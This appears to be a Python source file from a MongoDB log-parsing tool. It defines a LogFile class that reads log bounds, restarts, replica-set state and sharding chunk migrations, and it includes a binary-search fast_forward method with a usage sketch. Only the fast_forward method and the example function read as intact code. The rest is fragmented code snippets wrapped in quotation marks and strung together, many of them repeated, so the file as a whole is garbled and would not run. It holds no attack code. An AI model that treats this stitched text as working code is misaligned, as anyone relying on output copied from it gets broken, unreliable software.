le.datetime >= start_dt:", "return self._repl_set @property def repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\"", "lower bound while abs(step_size) > 100: step_size = ceil(step_size /", "until we found a truly smaller line while self.filehandle.tell() >=", "move back to last newline char if newline_pos == -1:", "logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if", "TICKET is added moved_from = \"Unknown\" note = match.group('note') if", "self.filehandle.seek(0) self._bounds_calculated = True return True def _find_curr_line(self, prev=False): \"\"\"", "MongoDB 3.0+ new_config = (\"New replica set config in use:", "return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\"", "long entry contained the \"engine\" field if WiredTiger was the", "line: logevent = LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits: 
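
    # Note on the seek strategy used by fast_forward() below: it bisects by
    # byte offset, and after every seek it relies on _find_curr_line() above
    # to resynchronize on the previous newline and parse a LogEvent whose
    # datetime can be compared against the target. Once the bisection step
    # shrinks below 100 bytes it walks backwards line by line, so the file
    # position ends up just before the first line at or after start_dt.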
    def fast_forward(self, start_dt):
        """
        Fast-forward file to given start_dt datetime obj using binary search.

        Only fast for files. Streams need to be forwarded manually, and it
        will miss the first line that would otherwise match (as it consumes
        the log line).
        """
        if self.from_stdin:
            # skip lines until start_dt is reached
            return

        else:
            # fast bisection path
            max_mark = self.filesize
            step_size = max_mark

            # check if start_dt is already smaller than first datetime
            self.filehandle.seek(0)
            le = self.next()
            if le.datetime and le.datetime >= start_dt:
                self.filehandle.seek(0)
                return

            le = None
            self.filehandle.seek(0)

            # search for lower bound
            while abs(step_size) > 100:
                step_size = ceil(step_size / 2.)

                self.filehandle.seek(step_size, 1)
                le = self._find_curr_line()
                if not le:
                    break

                if le.datetime >= start_dt:
                    step_size = -abs(step_size)
                else:
                    step_size = abs(step_size)

            if not le:
                return

            # now walk backwards until we found a truly smaller line
            while (self.filehandle.tell() >= 2 and
                    (le.datetime is None or le.datetime >= start_dt)):
                self.filehandle.seek(-2, 1)
                le = self._find_curr_line(prev=True)
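

# ---------------------------------------------------------------------------
# Minimal usage sketches. These are illustrative only: the file paths, the
# one-minute window, and the printed fields are assumptions made for the
# examples, not fixtures that ship with the module. Log files are opened in
# binary mode because the relative seeks above require it.

def _example_fast_forward(path='mongod.log'):
    """Sketch: bisect to the last minute of a log instead of scanning it."""
    from datetime import timedelta

    with open(path, 'rb') as f:
        logfile = LogFile(f)
        print("log covers %s to %s (%s lines)"
              % (logfile.start, logfile.end, logfile.num_lines))

        # binary search for the offset of the first line in the window,
        # then iterate LogEvents from there
        logfile.fast_forward(logfile.end - timedelta(minutes=1))
        for le in logfile:
            if le.datetime:
                print(le.datetime, le.line_str)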
self._iterate_lines() return self._storage_engine @property def shards(self): \"\"\"Lazily", "= re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match:", "now walk backwards until we found a truly smaller line", "line). \"\"\" if self.from_stdin: # skip lines until start_dt is", "self._repl_set_members = match.group('replSetMembers') # if (\"is now in state\" in", "e: # end of log file, get end date if", "return le = None self.filehandle.seek(0) # search for lower bound", "self.filehandle.seek(-min(self._filesize, 30000), 2) for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line)", "else: host = os.path.basename(self.name) host += ' (self)' if tokens[-1]", "abs(step_size) if not le: return # now walk backwards until", "contains the \"engine\" field So now we have to look", "# 2.6 if tokens[1].endswith(']'): pos = 4 else: pos =", "True error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken,", "class. Handles open file streams or stdin.\"\"\" def __init__(self, filehandle):", "'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the", "= match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits = 0 success =", "Replica set config logging in MongoDB 3.0+ new_config = (\"New", "line.rstrip('\\n') le = LogEvent(line) # hint format and nextpos from", "\"configsvr: true\" in line: match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members:", "logfile. Returns None for stdin input currently. \"\"\" if self.from_stdin:", "LogFile(InputSource): \"\"\"Log file wrapper class. Handles open file streams or", "the split vector for\" in line: logevent = LogEvent(line) match", "error = \"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))", "isinstance(line, bytes): line = line.decode('utf-8', 'replace') if line == '':", "if le and le.datetime: self._start = le.datetime try: yield le", "None # make sure bounds are calculated before starting to", "line, adjust for year rollover and hint datetime format.\"\"\" #", "for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime: self._end", "number of lines in a log file.\"\"\" return self.num_lines def", "if self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') ))", "if match: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"Starting", "# gather new hint info from another logevent self._datetime_format =", "None if not self._filesize: self._calculate_bounds() return self._filesize @property def datetime_format(self):", "within max_start_lines max_start_lines = 10 lines_checked = 0 # get", "moved_to = match.group('movedTo') note = match.group('note') if note == \"success\":", "@property def chunks_moved_to(self): \"\"\"Lazily return the chunks moved to this", "the number of lines in a log file.\"\"\" return self.num_lines", "in line: if \"configsvr: true\" in line: match = re.search('", "version else: return False def _calculate_bounds(self): \"\"\"Calculate beginning and end", "else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info", "(?P<replSetMembers>[^]]+ ])', line) if match: self._csrs = ( match.group('replSet'), match.group('replSetMembers')", "logevent.line_str or 'mongos' in logevent.line_str): self._binary = 
'mongos' else: return", "log file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count number of lines", "self._year_rollover = self._end else: self._year_rollover = False # reset logfile", "= [] prev_line = \"\" for line in self.filehandle: if", "logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0", "as open file stream or stdin.\"\"\" self.filehandle = filehandle self.name", "= re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match: self._repl_set = match.group('replSet') match", "None self._storage_engine = None self._datetime_format = None self._year_rollover = None", "information \"\"\" self._shards = [] self._chunks_moved_from = [] self._chunks_moved_to =", "PEP 479 return # get start date for stdin input", ">= 2 and (le.datetime is None or le.datetime >= start_dt):", "not logevent.datetime: logevent = self.next() return logevent except StopIteration: #", "1) buff = self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal", ")) elif not self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers') )", "first datetime self.filehandle.seek(0) le = self.next() if le.datetime and le.datetime", "in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime: self._end = logevent.datetime", "file, get end date if not self.end and self.from_stdin: if", "= False self._start = None self._end = None self._filesize =", "in line: tokens = line.split() if self._hostname: host = self._hostname", "1 if logevent.datetime: self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format", "in line[:100]: logevent = LogEvent(line) restart = self._check_for_restart(logevent) if restart:", "host += ' (self)' if tokens[-1] in self.states: rs_state =", "self._num_lines = ln + 1 # reset logfile self.filehandle.seek(0) def", "error)) prev_line = line # reset logfile self.filehandle.seek(0) def fast_forward(self,", "def binary(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not", "self.filehandle.seek(0) # return (instead of raising StopIteration exception) per PEP", "prev=True) line in a log file based on the current", "there was a roll-over, subtract 1 year from start time", "the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_members", "(?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range =", "re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if", "if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily", "name when SERVER-45770 TICKET is added moved_from = \"Unknown\" note", "@property def storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if not", "None while True: try: le = self.next() except StopIteration as", "if \"starting :\" in line or \"starting:\" in line: #", "\"[initandlisten] wiredtiger_open config:\" which was present in 3.0, but would", "'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self):", "re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' ' :: caused by", "for stdin input if not self.start and self.from_stdin: if le", "line: logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: {", "and ('MongoS' in logevent.line_str or 'mongos' in 
logevent.line_str): self._binary =", "= logevent.datetime split_range = None namespace = match.group(\"namespace\") numSplits =", "':' + self._port else: host = os.path.basename(self.name) host += '", "= 300 self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos) hr = \"-\"", "in line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match:", "steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\"", "__len__(self): \"\"\"Return the number of lines in a log file.\"\"\"", "tokens = line.split() if self._hostname: host = self._hostname + ':'", "year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if self._year_rollover is", "= re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine = match.group('engine') else:", "continue if \"[rsMgr] replSet\" in line: tokens = line.split() if", "(at most) and find last newline char jump_back = min(self.filehandle.tell(),", "show before/after the log offset error_context = 300 self.filehandle.seek(-error_context, 1)", "rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\" in line: tokens", "config logging in MongoDB 3.0+ new_config = (\"New replica set", "self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line", "= self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line in reversed(self.filehandle.readlines()): logevent", "_find_curr_line() self.prev_pos = None self._has_level = None # make sure", "tell us definitively that wiredTiger is being used \"\"\" if", "self._iterate_lines() return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion", "the current seek position. 
\"\"\" curr_pos = self.filehandle.tell() # jump", "if newline_pos == -1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos - jump_back", "in use\" in line: if \"configsvr: true\" in line: match", "\"\"\"Provide logfile as open file stream or stdin.\"\"\" self.filehandle =", "def start(self): \"\"\" Lazy evaluation of start and end of", "self.prev_pos = curr_pos if isinstance(buff, bytes): buff = buff.decode(\"utf-8\", \"replace\")", "\"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if", "= match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration = (time, chunk_range,", "all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._rs_state @property def", "2.6 if tokens[1].endswith(']'): pos = 2 else: pos = 6", "'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set = match.group('replSet') self._repl_set_members", "line: if \"configsvr: true\" in line: match = re.search(' _id:", "in _find_curr_line() self.prev_pos = None self._has_level = None # make", "line # reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward", "def chunks_moved_from(self): \"\"\"Lazily return the chunks moved from this shard", "return the chunks split in this shard (if available)\"\"\" if", "None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg =", "= 10 lines_checked = 0 # get start datetime for", "= False time_taken = 0 error = \"Jumbo\" self._chunk_splits.append((time, split_range,", "beginning and end of logfile.\"\"\" if self._bounds_calculated: # Assume no", "all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._restarts @property def", "error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))", "if version: version = version.group(1) return version else: return False", "= None self._filesize = None self._num_lines = None self._restarts =", "the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set", "when SERVER-45770 TICKET is added moved_from = \"Unknown\" note =", "self._repl_set @property def repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\" if", "protocolVersion (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property", "For 3.2 the \"[initandlisten] options:\" no longer contains the \"engine\"", "available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self):", "python3 from __future__ import print_function import os import re import", "self._repl_set_protocol = None self._storage_engine = None self._datetime_format = None self._year_rollover", "import ceil from mtools.util.input_source import InputSource from mtools.util.logevent import LogEvent", "SystemExit(\"Cannot parse %s with requested options\" % self.filehandle.name) else: self.prev_pos", "- 1) self._year_rollover = self._end else: self._year_rollover = False #", "def hostname(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not", "le and le.datetime: self._end = le.datetime # future iterations start", "or \"starting:\" in line: # look for hostname, port match", "parse %s with requested options\" % self.filehandle.name) else: self.prev_pos =", "\\d): (?P<stepTimes>\\d+)', line) else: match = re.search(':: caused by ::", "= 0 for ln, line in enumerate(self.filehandle): if 
isinstance(line, bytes):", "file format\" % self.filehandle.name) # get end datetime (lines are", "not None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret:", "new replica set monitor for\" in line: match = re.search(\"for", "(['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def", "return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if", "now we have to look for the \"[initandlisten] wiredtiger_open config:\"", "except StopIteration: # reached end of file return None def", "self._iterate_lines() return self._binary @property def hostname(self): \"\"\"Lazy evaluation of the", "reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime: self._end = logevent.datetime break", "15000) self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if prev", "= match.group('namespace') moved_to = match.group('movedTo') note = match.group('note') if note", "beginning if not self.from_stdin: self.filehandle.seek(0) # return (instead of raising", "return the chunks moved to this shard (if available)\"\"\" if", "= 'wiredTiger' if \"command admin.$cmd command: { replSetInitiate:\" in line:", "self._has_level = True # find version string (fast check to", "filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated = False self._start", "[] self._rs_state = [] ln = 0 for ln, line", "timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone @property", "v, _ in self.restarts: if len(versions) == 0 or v", "'mongos' in logevent.line_str): self._binary = 'mongos' else: return False version", "match: self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if", "= 6 rs_state = ' '.join(tokens[pos:]) state = (host, rs_state,", "internal readahead # buffer so seek position is wrong line", "None for stdin input currently. \"\"\" if not self._start: self._calculate_bounds()", "re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg = match.group('errmsg') chunk_migration =", "line = self.filehandle.readline() if isinstance(line, bytes): line = line.decode('utf-8', 'replace')", "min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if", "chunk_range, moved_to, namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in", "if match: self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica", "= match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0 success =", "le = LogEvent(line) # hint format and nextpos from previous", "(if available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards @property def", "line in enumerate(self.filehandle): if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\")", "found a truly smaller line while self.filehandle.tell() >= 2 and", "if not self._num_lines: self._iterate_lines() return self._repl_set @property def repl_set_members(self): \"\"\"Return", "for lower bound while abs(step_size) > 100: step_size = ceil(step_size", "self.filehandle.seek(curr_pos, 0) if prev and self.prev_pos is not None and", "currently. 
\"\"\" if not self._start: self._calculate_bounds() return self._start @property def", "= self.next() except StopIteration as e: # end of log", "line) else: steps = None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line)", "before/after the log offset error_context = 300 self.filehandle.seek(-error_context, 1) buff", "available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set @property def repl_set_members(self):", "LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level = True # find", "return None if not self._num_lines: self._iterate_lines() return self._num_lines @property def", "= 2 else: pos = 6 rs_state = ' '.join(tokens[pos:])", "%s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name,", "return (instead of raising StopIteration exception) per PEP 479 return", "self.from_stdin: return None if not self._filesize: self._calculate_bounds() return self._filesize @property", "\"Unable to auto-split chunk\" in line: logevent = LogEvent(line) match", "start_dt: self.filehandle.seek(0) return le = None self.filehandle.seek(0) # search for", "prev and self.prev_pos is not None and self.prev_pos == curr_pos:", "', line) if match: time = logevent.datetime split_range = match.group(\"range\")", "to show before/after the log offset error_context = 300 self.filehandle.seek(-error_context,", "not self.end and self.from_stdin: if le and le.datetime: self._end =", "= logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos =", "= self.filehandle.readline() if isinstance(line, bytes): line = line.decode('utf-8', 'replace') if", "self._chunks_moved_to = [] self._chunk_splits = [] prev_line = \"\" for", "= self._find_curr_line() if not le: break if le.datetime >= start_dt:", "# we should be able to find a valid log", "moved from this shard (if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info()", "stdin.\"\"\" self.filehandle = filehandle self.name = filehandle.name self.from_stdin = filehandle.name", "match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match:", "= LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)'", "self._has_level = None # make sure bounds are calculated before", "self._calculate_bounds() @property def start(self): \"\"\" Lazy evaluation of start and", "prev=False): \"\"\" Internal helper function. 
Find the current (or previous", "smaller than first datetime self.filehandle.seek(0) le = self.next() if le.datetime", "not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily return", "return self.num_lines def _iterate_lines(self): \"\"\"Count number of lines (can be", "iterations start from the beginning if not self.from_stdin: self.filehandle.seek(0) #", "match: errmsg = match.group('errmsg') chunk_migration = (time, chunk_range, moved_from, namespace,", "self.from_stdin: if le and le.datetime: self._end = le.datetime # future", "@property def filesize(self): \"\"\" Lazy evaluation of start and end", "available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self):", "= ' '.join(tokens[pos:]) state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue", "namespace = match.group('namespace') moved_to = match.group('movedTo') note = match.group('note') if", "+ self._port else: host = os.path.basename(self.name) host += ' (self)'", "'replace') if line == '': raise StopIteration line = line.rstrip('\\n')", "(self._has_level is None and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in", "\"(?P<replSet>\\S+)\"', line) if match: self._repl_set = match.group('replSet') match = re.search('engine:", "stdin input currently. \"\"\" if not self._end: self._calculate_bounds() return self._end", "self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine", "in a log file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count number", "prev_line = \"\" for line in self.filehandle: if isinstance(line, bytes):", "time = logevent.datetime split_range = None namespace = match.group(\"namespace\") numSplits", "line: logevent = LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*),", "(instead of raising StopIteration exception) per PEP 479 return #", "(as it consumes the log line). 
\"\"\" if self.from_stdin: #", "time_taken, error)) elif \"Unable to auto-split chunk\" in line: logevent", "@property def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if available).\"\"\" if", "datetime format.\"\"\" # use readline here because next() iterator uses", "# reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread ==", "for line in self.filehandle: if isinstance(line, bytes): line = line.decode(\"utf-8\",", "= logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if", "format.\"\"\" if self._year_rollover is None: self._calculate_bounds() return self._year_rollover @property def", "Iterate over file and find any sharding related information \"\"\"", "(?P<namespace>\\S+)' ' :: caused by :: (?P<error>\\S+): ', line) if", "if self._datetime_format and self._datetime_nextpos is not None: ret = le.set_datetime_hint(self._datetime_format,", "@property def datetime_format(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if", "self._rs_state @property def binary(self): \"\"\"Lazy evaluation of the binary name.\"\"\"", "= line.decode(\"utf-8\", \"replace\") if (self._has_level is None and line[28:31].strip() in", "self._start = self._start.replace(year=self._start.year - 1) self._year_rollover = self._end else: self._year_rollover", "match.group('replSetMembers') # if (\"is now in state\" in line and", "moved_from, namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split", "tokens[pos] rs_state = tokens[-1] state = (host, rs_state, LogEvent(line)) self._rs_state.append(state)", "else: pos = 6 rs_state = ' '.join(tokens[pos:]) state =", "vector for\" in line: logevent = LogEvent(line) match = re.search('for", "recalc bounds for lifetime of a Logfile object return if", "buff.rfind('\\n') if prev: newline_pos = buff[:newline_pos].rfind('\\n') # move back to", "= None if match: errmsg = match.group('errmsg') else: errmsg =", "\"\"\"Lazily return the chunks moved to this shard (if available)\"\"\"", "= re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if", "self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked > max_start_lines: break #", "logfile has any level lines.\"\"\" if self._has_level is None: self._iterate_lines()", "= re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time =", "from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos return", "match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits = 0 success = True", "= match.group('range') namespace = match.group('namespace') moved_to = match.group('movedTo') note =", "logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked > max_start_lines: break", "the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._binary @property", "self.end and self.from_stdin: if le and le.datetime: self._end = le.datetime", "# if there was a roll-over, subtract 1 year from", "self._hostname = None self._port = None self._rs_state = None self._repl_set", "return self._binary @property def hostname(self): \"\"\"Lazy evaluation of the binary", "= filehandle self.name = filehandle.name self.from_stdin = filehandle.name == \"<stdin>\"", "re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: steps = 
None", "= self.filesize step_size = max_mark # check if start_dt is", "self._repl_set_members = None self._repl_set_version = None self._repl_set_protocol = None self._storage_engine", "errmsg = None steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)',", "match.group('range') namespace = match.group('namespace') # TODO: alter this to find", "while abs(step_size) > 100: step_size = ceil(step_size / 2.) self.filehandle.seek(step_size,", "string (fast check to eliminate most lines) if \"version\" in", "was the storage engine. There were only two engines, MMAPv1", "forward until we found a line with a datetime try:", "time = logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken", "loop detected trying to find previous \" \"log line near", "as e: # end of log file, get end date", "# look for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if", "step_size = ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line()", "new replica set monitor for\" in line: if \"[mongosMain]\" in", "reached end of file return None def _find_sharding_info(self): \"\"\" Iterate", "line (generator). \"\"\" le = None while True: try: le", "return versions @property def repl_set(self): \"\"\"Return the replSet (if available).\"\"\"", "= (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\": logevent =", "'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the number of lines", "curr_pos if isinstance(buff, bytes): buff = buff.decode(\"utf-8\", \"replace\") newline_pos =", "from start time if self._end < self._start: self._start = self._start.replace(year=self._start.year", "number of lines. Returns None for stdin input currently. \"\"\"", "\"\"\"Return all version changes.\"\"\" versions = [] for v, _", "file based on the current seek position. \"\"\" curr_pos =", "__future__ import print_function import os import re import sys from", "\"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range =", "time if self._end < self._start: self._start = self._start.replace(year=self._start.year - 1)", "match.group(\"namespace\") numSplits = match.group('numSplits') success = None time_taken = 0", "else: match = re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line) steps", "for\" in line: if \"[mongosMain]\" in line: match = re.search(\"for", "and self._datetime_nextpos is not None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover)", "elif le.datetime: # gather new hint info from another logevent", "None self._shards = None self._csrs = None self._chunks_moved_from = None", "\"version\" in line[:100]: logevent = LogEvent(line) restart = self._check_for_restart(logevent) if", "self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"Starting new replica", "StopIteration: # reached end of file return None def _find_sharding_info(self):", "_find_sharding_info(self): \"\"\" Iterate over file and find any sharding related", "line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: csrs_info", "2.) 
self.filehandle.seek(step_size, 1) le = self._find_curr_line() if not le: break", "= False time_taken = 0 error = match.group(\"error\") self._chunk_splits.append((time, split_range,", "if \"Starting new replica set monitor for\" in line: match", "match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs", "= le.datetime # future iterations start from the beginning if", "= filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated = False", "= match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match:", "\"engine\" field if WiredTiger was the storage engine. There were", "prev: newline_pos = buff[:newline_pos].rfind('\\n') # move back to last newline", "match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if", "self.from_stdin: # skip lines until start_dt is reached return else:", "def timezone(self): \"\"\"Lazy evaluation of timezone of logfile.\"\"\" if not", "= None self._chunk_splits = None # Track previous file position", "invalidate hint info self._datetime_format = None self._datetime_nextpos = None elif", "+= 1 if logevent.datetime: self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo", "input currently. \"\"\" if not self._end: self._calculate_bounds() return self._end @property", "line) if match: self._repl_set_members = match.group('replSetMembers') # if (\"is now", "\\n%s\\n%s\\n\" % (curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context + 1], hr),", "hostname(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not self._num_lines:", "None self._repl_set = None self._repl_set_members = None self._repl_set_version = None", "# if (\"is now in state\" in line and #", "in states if line.endswith(state))): if \"is now in state\" in", "not le: return # now walk backwards until we found", "else: errmsg = \"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace,", "raise SystemExit(\"Error: <%s> does not appear to be a supported", "host = os.path.basename(self.name) host += ' (self)' if tokens[-1] in", "backwards until we found a truly smaller line while self.filehandle.tell()", "= None elif le.datetime: # gather new hint info from", "\"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._csrs = (", "return version else: return False def _calculate_bounds(self): \"\"\"Calculate beginning and", "def fast_forward(self, start_dt): \"\"\" Fast-forward file to given start_dt datetime", "self.filehandle: if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if self.binary", "\"\"\"Return storage engine if available.\"\"\" if not self._num_lines: self._iterate_lines() return", "except StopIteration as e: # end of log file, get", "le = None while True: try: le = self.next() except", "numSplits, success, time_taken, error)) elif \"jumbo\" in line: logevent =", "return self._filesize @property def datetime_format(self): \"\"\"Lazy evaluation of the datetime", "2.6 if tokens[1].endswith(']'): pos = 4 else: pos = 5" ]
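The fragments above deduplicate into a MongoDB log file wrapper in the style of mtools' LogFile. A minimal usage sketch under that assumption (mtools provides mtools.util.logfile.LogFile; the path mongod.log and the start date below are hypothetical):

from datetime import datetime, timezone

from mtools.util.logfile import LogFile

# open a log and wrap it; bounds (start/end/timezone) are computed lazily
with open('mongod.log', 'r') as f:
    logfile = LogFile(f)
    print(logfile.start, logfile.end, logfile.binary)

    # binary-search the file to a start datetime, then iterate LogEvents
    logfile.fast_forward(datetime(2022, 1, 1, tzinfo=timezone.utc))
    for le in logfile:
        if le.datetime:
            print(le.datetime, le.line_str[:80])

Because fast_forward only repositions the file handle, the subsequent iteration begins at the first parseable line at or after the requested datetime.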
